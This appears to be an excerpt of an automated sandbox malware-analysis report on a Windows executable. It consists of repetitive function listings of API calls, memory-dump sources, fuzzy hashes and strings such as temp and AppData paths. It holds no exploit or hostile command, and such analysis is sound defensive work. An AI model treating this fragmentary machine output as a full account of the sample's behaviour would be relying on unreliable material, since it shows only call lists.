                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: ExecuteShell
                                              • String ID:
                                              • API String ID: 587946157-0
                                              • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                              • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                              • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                              • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                              APIs
                                              • SendMessageW.USER32(?,?,00000001,004041BF), ref: 004043A2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                              • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                              • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                              • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19
                                              APIs
                                              • KiUserCallbackDispatcher.NTDLL(?,00404158), ref: 0040438B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: CallbackDispatcherUser
                                              • String ID:
                                              • API String ID: 2492992576-0
                                              • Opcode ID: edeae3ac3cfecc704656ce7adf69815daf45002a40afc9e9c99c0eaf63a7b25e
                                              • Instruction ID: bc9b5adeae0d36b04141253452f110da710a6babf688c590b829c7787f218d6b
                                              • Opcode Fuzzy Hash: edeae3ac3cfecc704656ce7adf69815daf45002a40afc9e9c99c0eaf63a7b25e
                                              • Instruction Fuzzy Hash: 34A002B65445009BCE119F50DF05805BA71F7E47417518479A155510348A354561EB19
                                              APIs
                                              • GlobalAlloc.KERNELBASE(?,?,73C6123B,?,73C612DF,00000019,73C611BE,-000000A0), ref: 73C61225
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1397177339.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true
                                              • Associated: 00000000.00000002.1396201484.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.1397405949.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.1399176376.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73c60000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: AllocGlobal
                                              • String ID:
                                              • API String ID: 3761449716-0
                                              • Opcode ID: d4695aee10800d336d52caf8fa3b67adfcef965dc0b453e9b4ae141c066f8da1
                                              • Instruction ID: 0ee4f3404d497d2a4800d1e7967e183154503347f63ee3b39ac1fb6d6e09fdf5
                                              • Opcode Fuzzy Hash: d4695aee10800d336d52caf8fa3b67adfcef965dc0b453e9b4ae141c066f8da1
                                              • Instruction Fuzzy Hash: 00B002B2A44550DFEE40EB67CD46F353654E744705F644050F709DD1C5D564DC148575
                                              APIs
                                              • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                              • GetDlgItem.USER32(?,?), ref: 00404DEF
                                              • GlobalAlloc.KERNEL32(?,?), ref: 00404E39
                                              • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                              • SetWindowLongW.USER32(?,?,004053C4), ref: 00404E65
                                              • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404E79
                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                              • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404EBF
                                              • DeleteObject.GDI32(00000000), ref: 00404EC2
                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                              • GetWindowLongW.USER32(?,?), ref: 00404FFD
                                              • SetWindowLongW.USER32(?,?,00000000), ref: 0040500B
                                              • ShowWindow.USER32(?,00000005), ref: 0040501C
                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00405193
                                              • SendMessageW.USER32(?,?,00000000,?), ref: 004051B7
                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                              • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                              • GlobalFree.KERNEL32(?), ref: 004051FC
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                              • ShowWindow.USER32(?,00000000), ref: 0040539B
                                              • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                              • ShowWindow.USER32(00000000), ref: 004053AD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                              • String ID: $M$N
                                              • API String ID: 1638840714-813528018
                                              • Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                              • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                              • Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                              • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                              APIs
                                              • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                              • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                              • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                              • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
                                              • lstrcatW.KERNEL32(?,Call), ref: 004049C3
                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,?,00404A0C), ref: 00405A45
                                                • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\KO0q4biYfC.exe",00403480,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,?,0000000A), ref: 004066DF
                                                • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004066EE
                                                • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\KO0q4biYfC.exe",00403480,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,?,0000000A), ref: 004066F3
                                                • Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\KO0q4biYfC.exe",00403480,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,?,0000000A), ref: 00406706
                                              • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: (7B$A$C:\Users\user\AppData\Roaming\brugser\brugo$Call
                                              • API String ID: 2624150263-2438073506
                                              • Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                              • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                              • Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                              • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: FileFindFirst
                                              • String ID:
                                              • API String ID: 1974802433-0
                                              • Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                              • Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
                                              • Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                              • Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A
                                              APIs
                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                              • GetDlgItem.USER32(?,?), ref: 004045D0
                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                              • GetSysColor.USER32(?), ref: 004045FE
                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                              • lstrlenW.KERNEL32(?), ref: 0040461F
                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                              • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                              • SendMessageW.USER32(00000000), ref: 004046A1
                                              • GetDlgItem.USER32(?,?), ref: 004046CC
                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                              • SetCursor.USER32(00000000), ref: 00404720
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                              • SetCursor.USER32(00000000), ref: 0040473C
                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                              • SendMessageW.USER32(?,00000000,00000000), ref: 0040477D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                              • String ID: Call$N
                                              • API String ID: 3103080414-3438112850
                                              • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                              • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                              • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                              • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                              APIs
                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                              • BeginPaint.USER32(?,?), ref: 00401047
                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                              • DeleteObject.GDI32(?), ref: 004010ED
                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                              • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                              • DeleteObject.GDI32(?), ref: 00401165
                                              • EndPaint.USER32(?,?), ref: 0040116E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                              • String ID: F
                                              • API String ID: 941294808-1304234792
                                              • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                              • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                              • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                              • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                              APIs
                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                              • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                              • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                              • wsprintfA.USER32 ref: 004060B3
                                              • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,?,004275C8,?,?,?,?,?), ref: 004060EE
                                              • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 004060FD
                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                              • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                              • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\KO0q4biYfC.exe,80000000,00000003), ref: 00405EE2
                                                • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                              • String ID: %ls=%ls$[Rename]
                                              • API String ID: 2171350718-461813615
                                              • Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                              • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                              • Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                              • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                              APIs
                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\KO0q4biYfC.exe",00403480,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,?,0000000A), ref: 004066DF
                                              • CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004066EE
                                              • CharNextW.USER32(?,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\KO0q4biYfC.exe",00403480,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,?,0000000A), ref: 004066F3
                                              • CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\KO0q4biYfC.exe",00403480,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,?,0000000A), ref: 00406706
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Char$Next$Prev
                                              • String ID: "C:\Users\user\Desktop\KO0q4biYfC.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                              • API String ID: 589700163-102408103
                                              • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                              • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                              • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                              • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                              • GetSysColor.USER32(00000000), ref: 00404421
                                              • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                              • SetBkMode.GDI32(?,?), ref: 00404439
                                              • GetSysColor.USER32(?), ref: 0040444C
                                              • SetBkColor.GDI32(?,?), ref: 0040445C
                                              • DeleteObject.GDI32(?), ref: 00404476
                                              • CreateBrushIndirect.GDI32(?), ref: 00404480
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
